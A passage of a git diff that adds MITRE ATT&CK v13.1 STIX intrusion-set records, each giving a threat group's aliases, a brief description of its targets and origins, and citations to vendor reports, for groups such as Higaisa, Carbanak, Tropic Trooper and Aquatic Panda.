"https://security.web.cern.ch/advisories/windigo/windigo.shtml", + "description": "CERN. (2019, June 4). 2019/06/04 Advisory: Windigo attacks. Retrieved February 10, 2021." + } + ], + "modified": "2021-04-26T22:32:57.046Z", + "name": "Windigo", + "description": "The [Windigo](https://attack.mitre.org/groups/G0124) group has been operating since at least 2011, compromising thousands of Linux and Unix servers using the [Ebury](https://attack.mitre.org/software/S0377) SSH backdoor to create a spam botnet. 
Despite law enforcement intervention against the creators, [Windigo](https://attack.mitre.org/groups/G0124) operators continued updating [Ebury](https://attack.mitre.org/software/S0377) through 2019.(Citation: ESET Windigo Mar 2014)(Citation: CERN Windigo June 2019)", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--54dfec3e-6464-4f74-9d69-b7c817b7e5a3.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--54dfec3e-6464-4f74-9d69-b7c817b7e5a3.json new file mode 100644 index 0000000000000000000000000000000000000000..5fbd8fe2ffde4c868524d3f173417fba018132fd --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--54dfec3e-6464-4f74-9d69-b7c817b7e5a3.json 
@@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--2071d209-5ba2-4dc1-9167-2a50bd60221e", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Higaisa" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Daniyal Naeem, BT Security" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--54dfec3e-6464-4f74-9d69-b7c817b7e5a3", + "type": "intrusion-set", + "created": "2021-03-05T18:54:56.267Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0126", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0126" + }, + { + "source_name": "Malwarebytes Higaisa 2020", + "url": "https://blog.malwarebytes.com/threat-analysis/2020/06/higaisa/", + "description": "Malwarebytes Threat Intelligence Team. (2020, June 4). New LNK attack tied to Higaisa APT discovered. Retrieved March 2, 2021." + }, + { + "source_name": "Zscaler Higaisa 2020", + "url": "https://www.zscaler.com/blogs/security-research/return-higaisa-apt", + "description": "Singh, S. Singh, A. (2020, June 11). The Return on the Higaisa APT. Retrieved March 2, 2021." + }, + { + "source_name": "PTSecurity Higaisa 2020", + "url": "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/covid-19-and-new-year-greetings-the-higaisa-group/", + "description": "PT ESC Threat Intelligence. (2020, June 4). COVID-19 and New Year greetings: an investigation into the tools and methods used by the Higaisa group. Retrieved March 2, 2021." + } + ], + "modified": "2021-04-22T02:12:43.892Z", + "name": "Higaisa", + "description": "[Higaisa](https://attack.mitre.org/groups/G0126) is a threat group suspected to have South Korean origins. 
[Higaisa](https://attack.mitre.org/groups/G0126) has targeted government, public, and trade organizations in North Korea; however, they have also carried out attacks in China, Japan, Russia, Poland, and other nations. [Higaisa](https://attack.mitre.org/groups/G0126) was first disclosed in early 2019 but is assessed to have operated as early as 2009.(Citation: Malwarebytes Higaisa 2020)(Citation: Zscaler Higaisa 2020)(Citation: PTSecurity Higaisa 2020)", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--55033a4d-3ffe-46b2-99b4-2c1541e9ce1c.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--55033a4d-3ffe-46b2-99b4-2c1541e9ce1c.json new file mode 100644 index 0000000000000000000000000000000000000000..5f3bc9545dfd312650a00e78f4729762f7068678 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--55033a4d-3ffe-46b2-99b4-2c1541e9ce1c.json 
@@ -0,0 +1,76 @@ +{ + "type": "bundle", + "id": "bundle--5471d760-5018-4c0c-849e-d5273f6cd0ec", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Carbanak", + "Anunak" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Anastasios Pingios" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--55033a4d-3ffe-46b2-99b4-2c1541e9ce1c", + "type": "intrusion-set", + "created": "2017-05-31T21:31:49.021Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0008", + "external_id": "G0008" + }, + { + "source_name": "Carbanak", + "description": "(Citation: Kaspersky Carbanak) (Citation: Fox-It Anunak Feb 2015)" + }, + { + "source_name": "Anunak", + "description": "(Citation: Fox-It Anunak Feb 2015)" + }, + { + "source_name": "Kaspersky Carbanak", + "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, February). CARBANAK APT THE GREAT BANK ROBBERY. Retrieved August 23, 2018.", + "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_APT_eng.pdf" + }, + { + "url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html", + "description": "Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.", + "source_name": "FireEye FIN7 April 2017" + }, + { + "source_name": "Europol Cobalt Mar 2018", + "description": "Europol. (2018, March 26). Mastermind Behind EUR 1 Billion Cyber Bank Robbery Arrested in Spain. 
Retrieved October 10, 2018.", + "url": "https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain" + }, + { + "source_name": "Secureworks GOLD NIAGARA Threat Profile", + "url": "https://www.secureworks.com/research/threat-profiles/gold-niagara", + "description": "CTU. (n.d.). GOLD NIAGARA. Retrieved September 21, 2021." + }, + { + "source_name": "Secureworks GOLD KINGSWOOD Threat Profile", + "url": "https://www.secureworks.com/research/threat-profiles/gold-kingswood?filter=item-financial-gain", + "description": "Secureworks. (n.d.). GOLD KINGSWOOD. Retrieved October 18, 2021." + }, + { + "source_name": "Fox-It Anunak Feb 2015", + "description": "Prins, R. (2015, February 16). Anunak (aka Carbanak) Update. Retrieved January 20, 2017.", + "url": "https://www.fox-it.com/en/news/blog/anunak-aka-carbanak-update/" + } + ], + "modified": "2021-10-18T21:02:30.899Z", + "name": "Carbanak", + "description": "[Carbanak](https://attack.mitre.org/groups/G0008) is a cybercriminal group that has used [Carbanak](https://attack.mitre.org/software/S0030) malware to target financial institutions since at least 2013. [Carbanak](https://attack.mitre.org/groups/G0008) may be linked to groups tracked separately as [Cobalt Group](https://attack.mitre.org/groups/G0080) and [FIN7](https://attack.mitre.org/groups/G0046) that have also used [Carbanak](https://attack.mitre.org/software/S0030) malware.(Citation: Kaspersky Carbanak)(Citation: FireEye FIN7 April 2017)(Citation: Europol Cobalt Mar 2018)(Citation: Secureworks GOLD NIAGARA Threat Profile)(Citation: Secureworks GOLD KINGSWOOD Threat Profile)", + "x_mitre_version": "2.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924.json new file mode 100644 index 0000000000000000000000000000000000000000..72e4f086025cb53089c69ab6ee49166e986a4b7d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924.json 
@@ -0,0 +1,72 @@ +{ + "type": "bundle", + "id": "bundle--45d417fe-e041-4afb-9793-76f75cbfa8ab", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Tropic Trooper", + "Pirate Panda", + "KeyBoy" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Edward Millington", + "Bart Parys" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924", + "type": "intrusion-set", + "created": "2019-01-29T20:17:48.717Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0081", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0081" + }, + { + "source_name": "Tropic Trooper", + "description": "(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: Unit 42 Tropic Trooper Nov 2016)" + }, + { + "source_name": "Pirate Panda", + "description": "(Citation: Crowdstrike Pirate Panda April 2020)" + }, + { + "source_name": "KeyBoy", + "description": "(Citation: Unit 42 Tropic Trooper Nov 2016)(Citation: TrendMicro Tropic Trooper Mar 2018)" + }, + { + "description": "Horejsi, J., et al. (2018, March 14). Tropic Trooper\u2019s New Strategy. Retrieved November 9, 2018.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/", + "source_name": "TrendMicro Tropic Trooper Mar 2018" + }, + { + "description": "Ray, V. (2016, November 22). Tropic Trooper Targets Taiwanese Government and Fossil Fuel Provider With Poison Ivy. 
Retrieved November 9, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/", + "source_name": "Unit 42 Tropic Trooper Nov 2016" + }, + { + "source_name": "TrendMicro Tropic Trooper May 2020", + "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf", + "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020." + }, + { + "source_name": "Crowdstrike Pirate Panda April 2020", + "url": "https://www.crowdstrike.com/blog/on-demand-webcast-crowdstrike-experts-on-covid-19-cybersecurity-challenges-and-recommendations/", + "description": "Busselen, M. (2020, April 7). On-demand Webcast: CrowdStrike Experts on COVID-19 Cybersecurity Challenges and Recommendations. Retrieved May 20, 2020." + } + ], + "modified": "2021-04-26T14:15:15.610Z", + "name": "Tropic Trooper", + "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) is an unaffiliated threat group that has led targeted campaigns against targets in Taiwan, the Philippines, and Hong Kong. [Tropic Trooper](https://attack.mitre.org/groups/G0081) focuses on targeting government, healthcare, transportation, and high-tech industries and has been active since 2011.(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: Unit 42 Tropic Trooper Nov 2016)(Citation: TrendMicro Tropic Trooper May 2020)", + "x_mitre_version": "1.4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--5636b7b3-d99b-4edd-aa05-ee649c1d4ef1.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--5636b7b3-d99b-4edd-aa05-ee649c1d4ef1.json new file mode 100644 index 0000000000000000000000000000000000000000..55fcc8ec76c6225f19d4f3d6288b94e65a285926 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--5636b7b3-d99b-4edd-aa05-ee649c1d4ef1.json 
@@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--b806dace-cbf8-4abb-ab85-0178783fe175", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Orangeworm" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Elger Vinicius S. Rodrigues, @elgervinicius, CYBINT Centre" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--5636b7b3-d99b-4edd-aa05-ee649c1d4ef1", + "type": "intrusion-set", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0071", + "external_id": "G0071" + }, + { + "source_name": "Orangeworm", + "description": "(Citation: Symantec Orangeworm April 2018)" + }, + { + "url": "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia", + "description": "Symantec Security Response Attack Investigation Team. (2018, April 23). New Orangeworm attack group targets the healthcare sector in the U.S., Europe, and Asia. Retrieved May 8, 2018.", + "source_name": "Symantec Orangeworm April 2018" + } + ], + "modified": "2021-10-26T22:29:09.327Z", + "name": "Orangeworm", + "description": "[Orangeworm](https://attack.mitre.org/groups/G0071) is a group that has targeted organizations in the healthcare sector in the United States, Europe, and Asia since at least 2015, likely for the purpose of corporate espionage.(Citation: Symantec Orangeworm April 2018)", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--59140a2e-d117-4206-9b2c-2a8662bd9d46.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--59140a2e-d117-4206-9b2c-2a8662bd9d46.json new file mode 100644 index 0000000000000000000000000000000000000000..67efd006afcd9d80fa0b2948c4b8b9ffa8be19aa --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--59140a2e-d117-4206-9b2c-2a8662bd9d46.json @@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--897010ab-2b18-4e3b-a70b-04ede0287e2c", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Taidoor" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--59140a2e-d117-4206-9b2c-2a8662bd9d46", + "type": "intrusion-set", + "created": "2017-05-31T21:31:52.018Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0015", + "external_id": "G0015" + } + ], + "modified": "2021-10-15T00:34:25.521Z", + "name": "Taidoor", + "description": "[Taidoor](https://attack.mitre.org/groups/G0015) has been deprecated, as the only technique it was linked to was deprecated in ATT&CK v7.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--5cbe0d3b-6fb1-471f-b591-4b192915116d.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--5cbe0d3b-6fb1-471f-b591-4b192915116d.json new file mode 100644 index 0000000000000000000000000000000000000000..95c4e9078ae30c0a29a828ecc04a5a55e81c9741 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--5cbe0d3b-6fb1-471f-b591-4b192915116d.json 
@@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--44f5a127-a98b-4e60-8060-dd0663f83487", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Suckfly" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "intrusion-set", + "id": "intrusion-set--5cbe0d3b-6fb1-471f-b591-4b192915116d", + "created": "2017-05-31T21:32:06.777Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "G0039", + "url": "https://attack.mitre.org/groups/G0039" + }, + { + "source_name": "Suckfly", + "description": "(Citation: Symantec Suckfly March 2016) (Citation: Symantec Suckfly May 2016)" + }, + { + "source_name": "Symantec Suckfly March 2016", + "url": "http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates", + "description": "DiMaggio, J. (2016, March 15). Suckfly: Revealing the secret life of your code signing certificates. Retrieved August 3, 2016." + }, + { + "source_name": "Symantec Suckfly May 2016", + "url": "http://www.symantec.com/connect/blogs/indian-organizations-targeted-suckfly-attacks", + "description": "DiMaggio, J. (2016, May 17). Indian organizations targeted in Suckfly attacks. Retrieved August 3, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Suckfly](https://attack.mitre.org/groups/G0039) is a China-based threat group that has been active since at least 2014. (Citation: Symantec Suckfly March 2016)", + "modified": "2022-04-15T16:27:38.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Suckfly", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--5ce5392a-3a6c-4e07-9df3-9b6a9159ac45.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--5ce5392a-3a6c-4e07-9df3-9b6a9159ac45.json new file mode 100644 index 0000000000000000000000000000000000000000..abe043e00029d1349cc3b7a9d96df0bfeb234fc3 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--5ce5392a-3a6c-4e07-9df3-9b6a9159ac45.json 
@@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--a1cf9487-3a44-456a-9874-1959085e63e2", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Putter Panda", + "APT2", + "MSUpdater" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--5ce5392a-3a6c-4e07-9df3-9b6a9159ac45", + "type": "intrusion-set", + "created": "2017-05-31T21:31:56.785Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0024", + "external_id": "G0024" + }, + { + "source_name": "Putter Panda", + "description": "(Citation: CrowdStrike Putter Panda) (Citation: Cylance Putter Panda)" + }, + { + "source_name": "APT2", + "description": "(Citation: Cylance Putter Panda)" + }, + { + "source_name": "MSUpdater", + "description": "(Citation: CrowdStrike Putter Panda)" + }, + { + "source_name": "CrowdStrike Putter Panda", + "description": "Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. Retrieved January 22, 2016.", + "url": "http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf" + }, + { + "url": "http://blog.cylance.com/puttering-into-the-future", + "description": "Gross, J. and Walter, J.. (2016, January 12). Puttering into the Future.... Retrieved January 22, 2016.", + "source_name": "Cylance Putter Panda" + } + ], + "modified": "2020-03-30T19:15:04.771Z", + "name": "Putter Panda", + "description": "[Putter Panda](https://attack.mitre.org/groups/G0024) is a Chinese threat group that has been attributed to Unit 61486 of the 12th Bureau of the PLA\u2019s 3rd General Staff Department (GSD). 
(Citation: CrowdStrike Putter Panda)", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--5e78ae92-3ffd-4b16-bf62-e798529d73f1.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--5e78ae92-3ffd-4b16-bf62-e798529d73f1.json new file mode 100644 index 0000000000000000000000000000000000000000..5dcb0c8e7f8d8ccd5fbb138413816d4809b08163 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--5e78ae92-3ffd-4b16-bf62-e798529d73f1.json 
@@ -0,0 +1,42 @@ +{ + "type": "bundle", + "id": "bundle--1bb204d4-61e7-4156-86d4-d46d902449e6", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-09-26T22:11:36.315Z", + "name": "Sharpshooter", + "description": "Operation [Sharpshooter](https://attack.mitre.org/groups/G0104) is the name of a cyber espionage campaign discovered in October 2018 targeting nuclear, defense, energy, and financial companies. Though overlaps between this adversary and [Lazarus Group](https://attack.mitre.org/groups/G0032) have been noted, definitive links have not been established.(Citation: McAfee Sharpshooter December 2018)", + "aliases": [ + "Sharpshooter" + ], + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "type": "intrusion-set", + "id": "intrusion-set--5e78ae92-3ffd-4b16-bf62-e798529d73f1", + "created": "2020-05-14T21:40:31.089Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0104", + "external_id": "G0104" + }, + { + "source_name": "McAfee Sharpshooter December 2018", + "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020.", + "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--5f3d0238-d058-44a9-8812-3dd1b6741a8c.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--5f3d0238-d058-44a9-8812-3dd1b6741a8c.json new file mode 100644 index 0000000000000000000000000000000000000000..d584b91d54cfc060bd6c7857e6583f0a8b28d0d7 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--5f3d0238-d058-44a9-8812-3dd1b6741a8c.json 
@@ -0,0 +1,42 @@ +{ + "type": "bundle", + "id": "bundle--ed6e2eaa-e1f3-4071-b5c8-e1a13da56375", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "POLONIUM" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "intrusion-set", + "id": "intrusion-set--5f3d0238-d058-44a9-8812-3dd1b6741a8c", + "created": "2022-07-01T19:07:04.253Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "G1005", + "url": "https://attack.mitre.org/groups/G1005" + }, + { + "source_name": "Microsoft POLONIUM June 2022", + "url": "https://www.microsoft.com/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/", + "description": "Microsoft. (2022, June 2). Exposing POLONIUM activity and infrastructure targeting Israeli organizations. Retrieved July 1, 2022." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[POLONIUM](https://attack.mitre.org/groups/G1005) is a Lebanon-based group that has primarily targeted Israeli organizations, including critical manufacturing, information technology, and defense industry companies, since at least February 2022. Security researchers assess [POLONIUM](https://attack.mitre.org/groups/G1005) has coordinated their operations with multiple actors affiliated with Iran\u2019s Ministry of Intelligence and Security (MOIS), based on victim overlap as well as common techniques and tooling.(Citation: Microsoft POLONIUM June 2022)", + "modified": "2022-08-10T12:31:10.192Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "POLONIUM", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--62a64fd3-aaf7-4d09-a375-d6f8bb118481.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--62a64fd3-aaf7-4d09-a375-d6f8bb118481.json new file mode 100644 index 0000000000000000000000000000000000000000..a902a2e39d405273e849597a3aae5acd1fb64a01 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--62a64fd3-aaf7-4d09-a375-d6f8bb118481.json 
@@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--a4302652-a411-480f-bfb5-ea3b123f3dc4", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "TA459" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Valerii Marchuk, Cybersecurity Help s.r.o." + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--62a64fd3-aaf7-4d09-a375-d6f8bb118481", + "type": "intrusion-set", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0062", + "external_id": "G0062" + }, + { + "source_name": "TA459", + "description": "(Citation: Proofpoint TA459 April 2017)" + }, + { + "url": "https://www.proofpoint.com/us/threat-insight/post/apt-targets-financial-analysts", + "description": "Axel F. (2017, April 27). APT Targets Financial Analysts with CVE-2017-0199. Retrieved February 15, 2018.", + "source_name": "Proofpoint TA459 April 2017" + } + ], + "modified": "2020-03-30T19:22:32.962Z", + "name": "TA459", + "description": "[TA459](https://attack.mitre.org/groups/G0062) is a threat group believed to operate out of China that has targeted countries including Russia, Belarus, Mongolia, and others. (Citation: Proofpoint TA459 April 2017)", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--64b52e7d-b2c4-4a02-9372-08a463f5dc11.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--64b52e7d-b2c4-4a02-9372-08a463f5dc11.json new file mode 100644 index 0000000000000000000000000000000000000000..55fe70caef159f75f7860a041340cbf1cbf30403 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--64b52e7d-b2c4-4a02-9372-08a463f5dc11.json 
@@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--e7a201de-43c0-4b11-a1a6-ae84ab3229d9", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-21T21:16:34.243Z", + "name": "Aquatic Panda", + "description": "[Aquatic Panda](https://attack.mitre.org/groups/G0143) is a suspected China-based threat group with a dual mission of intelligence collection and industrial espionage. Active since at least May 2020, [Aquatic Panda](https://attack.mitre.org/groups/G0143) has primarily targeted entities in the telecommunications, technology, and government sectors.(Citation: CrowdStrike AQUATIC PANDA December 2021)", + "aliases": [ + "Aquatic Panda" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "NST Assure Research Team, NetSentries Technologies", + "Pooja Natarajan, NEC Corporation India", + "Hiroki Nagahama, NEC Corporation", + "Manikantan Srinivasan, NEC Corporation India" + ], + "type": "intrusion-set", + "id": "intrusion-set--64b52e7d-b2c4-4a02-9372-08a463f5dc11", + "created": "2022-01-18T14:49:29.505Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0143", + "external_id": "G0143" + }, + { + "source_name": "CrowdStrike AQUATIC PANDA December 2021", + "description": "Wiley, B. et al. (2021, December 29). OverWatch Exposes AQUATIC PANDA in Possession of Log4Shell Exploit Tools During Hands-on Intrusion Attempt. 
Retrieved January 18, 2022.", + "url": "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--64d5f96a-f121-4d19-89f6-6709f5c49faa.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--64d5f96a-f121-4d19-89f6-6709f5c49faa.json new file mode 100644 index 0000000000000000000000000000000000000000..e2462872d85e04d1b01bc28da5c04234d9b778cc --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--64d5f96a-f121-4d19-89f6-6709f5c49faa.json 
